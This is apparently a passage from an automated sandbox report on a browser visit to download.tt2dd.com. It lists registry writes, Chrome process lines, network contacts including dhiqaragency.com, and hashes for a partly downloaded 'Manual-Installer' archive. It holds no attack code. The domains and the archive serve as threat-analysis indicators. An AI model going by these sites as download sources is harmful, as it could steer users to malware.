| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download.tt2dd.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa5db7ab58,0x7ffa5db7ab68,0x7ffa5db7ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2220 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3052 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4284 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4316 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1548 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1612 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5116 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4772 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5612 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5608 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5136 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5732 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6108 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5680 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | download.tt2dd.com | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| US | 8.8.8.8:53 | 242.44.178.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| US | 8.8.8.8:53 | dhiqaragency.com | udp |
| US | 172.67.215.245:443 | dhiqaragency.com | tcp |
| US | 8.8.8.8:53 | 245.215.67.172.in-addr.arpa | udp |
| US | 172.67.215.245:443 | dhiqaragency.com | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| GB | 172.217.16.238:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| GB | 142.250.200.42:443 | translate-pa.googleapis.com | udp |
| GB | 172.217.16.238:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 22.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.179.230:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.187.225:443 | yt3.ggpht.com | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.225:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| GB | 163.70.151.21:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | scontent.xx.fbcdn.net | udp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| US | 172.67.215.245:80 | dhiqaragency.com | tcp |
| US | 172.67.215.245:80 | dhiqaragency.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
Files
\??\pipe\crashpad_2980_DQKNCXILDTEXDAIF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5b4c6c4ded12f1059015b528c826ea90 |
| SHA1 | 3c59e7a9d56148797211010d94d4ef8ec6117eb5 |
| SHA256 | a1b793bc2acabab06bedff3935536756ee3fa1eb5feb939992afd4318e006758 |
| SHA512 | 3fe8751f870ec0b1258a1f325d92fd12b508255ec403a55b243853d8822de033fa818eea51678430abe65f3e53cc76765e16a7f5cd3feed79e731081cf724ba9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b1383c05c0eb90fb8c5dd0d0ed7c4813 |
| SHA1 | b939c88be68fe2eb2530d73d602372adfb6c1ca0 |
| SHA256 | 9656fe07905312709c81a1bb0103defc57ce015333166308e512e102c64ee90b |
| SHA512 | 900fcc3104313708ea0181a28029aab7408452b9ae413da96e210bae0a4fdafe0e3669af8d796351817aa86ee4e4d98e4cbf25d0e756b6cb28c83ffffb063815 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b0368e04454b90b088cf13ad8dfd98f4 |
| SHA1 | bef778ff139a5bd3498def825b3329c3b054a52f |
| SHA256 | ea3f68cbc0ab5b0488c2a184830f96cda2f787ddc6c3799a8d181e2dcd84db0e |
| SHA512 | 200a0518a25c07b2245fd0dd5f113f060fc2f6978567e2fc480864c7540e03429481b2a95e932819974100849c578d8eadbeaf51af8f78b39960d25b8efeab6f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 7fe2ca073e4d91308396ac13892cdcea |
| SHA1 | af2cfefffaee2dd9252f0991f45d0b90ab32a48f |
| SHA256 | 31590d9c7f3f21ae804e952b04d99141aeed24e87b2f1426b0d71d4dafcdbd72 |
| SHA512 | e34150a0bf02b995bb06b540cc127f344aa438a224bb142ace28006661ee9a69e19f8d1eeda508642d1b6cfac26457495fdad63bc7a8dab5fc69c72e022bcc58 |
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar.gz.crdownload
| MD5 | 712e95f9d0c5c7359aeaab697e099f9e |
| SHA1 | 9ff66a4d79e060d764093b70fe68949b62edf439 |
| SHA256 | d954514846c34e32e4cc7a29b840e4842a9dc7146c7daeb8ed454e301f52f7bf |
| SHA512 | 7582f4d0a001df350a0ae4da5e189388017c63345dc06e3c2656baa3e931688b4e8c0c127b107730f71dc3723e10ebf67fd1de17edac6fd29f15f23fed296b9f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8d073dbb6d79f47faa95750b9576441b |
| SHA1 | 6b7935095cc67c8fcb5170d4b49591b07ab88768 |
| SHA256 | 74bcc5e354105fc0381dadb2aa6f2c63498150f9ddd7163023ec55210e3ac5cb |
| SHA512 | 21dd0d81c35514b694c8723291be25c21adaa0cabb19c6d8fe9cd9549d3e57a00d8a1f3849f99abe836fd5abfe6783b61e49b70f1cca4bb1ea41aecfc204c7cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4264b58ce470cb841b6a5d8520d62193 |
| SHA1 | 67bafceee127ffae254fc09d8d756df6ee2f95ad |
| SHA256 | 567c8db0ad4d69bdf423e2badc059a34b8a16d4de8b5a21c758488ba2367f57a |
| SHA512 | 47ddeb12079e938067233cd88a43d266278f937caab57edaa7e1bffbf7d9d36aba9f9d8a2c8b606b8585a336a2227ad5d93da122dac2fd8d4555cd9e42c47cc0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 91a5ec168882fbe5790563a7099cae78 |
| SHA1 | 6d67eab4ca0ebcff0573771caa331b034e2dfac5 |
| SHA256 | 8cb2a5267f4a16f272adf57b74235d2bea37a93d8dda011111d722a1684b22e1 |
| SHA512 | 8eae5053fcd0970daec1a6a8d3d4dcba25788728f0ee8b611368ac4d5b9f327a08394dc1ba1d4c4b820f192be7a658cb7de3467b5b424a05b8cdff7437ff53bf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | bf82c9ba8725df400c2fec0dfdeab68c |
| SHA1 | 48705805d13349668cbe359a02722b07b28bd5cf |
| SHA256 | 8e435c67a507e46095a7e0ca4f533f4dfbb9e8b8d9f0bb7149a08dbdbe2a28df |
| SHA512 | aa99425c43be28bc41b58836f38881921cfb6e8dc9d6eb9d226b92809c2a47b422ed30004bad24815f9843598de23a7d7baca3eff45ff3af6769f850e64e1384 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5a326b.TMP
| MD5 | cb26dfcf2b8a53b7a318f03b0b5a2e80 |
| SHA1 | e3e15496a2b28f06279687342f40a5b11c6e1f69 |
| SHA256 | 552610507f02684937542d90fa0eb916f301860a7fbfa74f3104a84e6c778e65 |
| SHA512 | a4bd138051571c2050443977383e72ede63344169dee96bb6daf970877195e6ffbbac4a1d17cddab4ddc5b751be9cf0d5c8a3dc48da84429691b2dff15ed3103 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | e3c8c1891b4d4099db8167877f0ba99b |
| SHA1 | 7fb6355e07865bd9a7b3450669bcdfbb06791dee |
| SHA256 | f1734be6e93a161b829fd1fb2265810e948f4c22a4a12bf21960ff92b639fe44 |
| SHA512 | 23f9f99f3d56f22f4d162da8a7843b7575c2646a347ca9ac207f44879bcadb5870a79511626561068020fcdcdaa08305fcd2f0028a81785bd747ad004fddc085 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4b51732e9ba723289445f228add535ce |
| SHA1 | ff1a54ee2b587a6501355183131e7f0577eea25d |
| SHA256 | 8b6fb1b0f1214a6640518acff029913da1a64aaeb4a075e10786f3fc052c6eb5 |
| SHA512 | 5657ddd79b031e9ca4f1de08888fffa867e97cc45202e1f0cf73c67dad4ac1e9a2b06c2702fde2c5dbf176eed94a9788f6dc5315af215308fab8eef3022bcdb5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 34d5dffd3b44f46e1d3a34cc8f14fa1a |
